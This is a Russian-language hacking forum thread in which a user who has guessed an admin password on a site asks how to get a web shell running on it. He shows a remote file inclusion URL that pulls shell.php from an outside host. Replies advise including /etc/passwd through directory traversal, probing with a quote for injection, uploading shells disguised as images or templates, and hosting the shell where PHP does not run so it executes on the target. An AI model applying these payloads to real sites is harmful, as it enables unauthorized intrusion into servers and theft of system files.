Подскажите как залить шел: Подобрал пароль к админке. Там есть приблизительно такой вызов скрипта: http://www.hacksite.com/index.php?id?page=user024.php Я сделал так: http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php Как теперь сделать чтобы у меня был доступ к файлам атакуемого сервера? А то я вижу только свой сервер, свои файлы?
если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...
xXvladXx бред, читай что тс написал Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?
если ты зальешь шелл просто как файл /*без права на исполнение: картинка, видео, текст.. а потом локально инклюдить*/ но у тс скорее всего просто ифрейм.. /*судя по тому, что он видит файлы того сервера, где залит шелл*/ тс, попробуй проинклюдить /еtc/passwd или что-то другое не доступное через ифрейм *добавлено если ифрем, то это не инклуд))) ищи другие баги или попробуй через заливку /*картинок, банеров, темплейтов и других фалов*/, попробуй редактирование страниц, тепмлейтов
если во фрейме, то ничего не поделаешь. скорее всего просто открывается <frame src="http://shell.com/shell.php">
Как исккать /еtc/passwd? к UsrPage= Добавлять ../etc/passwd ? Как я тогда его увижу? Сдесь не выводятся\ сообщения об ошибках пробовал: UsrPage= .sfsd.f2r2 выводит страницу по дефолту. Ошибки нет. Если я наткнусь на /etc/passwd то выведит ли мне его на страницу?
да вожможно у него там даже нет ни какого инклуда попробуй подставить ковычку после http://www.hacksite.com/index.php?id&page=' и посмотри что у тебя получится
Не факт что во там именно ифрейм http://freehostia.com/free_hosting.html Смотрим сюда и видим PHP Enabled Это значит что шелл выполняется на blabla.freehostia.com и уже выводится на уязвимом сайте ТС, залей шелл на хостинг без PHP (narod.ru к примеру) и пробуй его проинклудить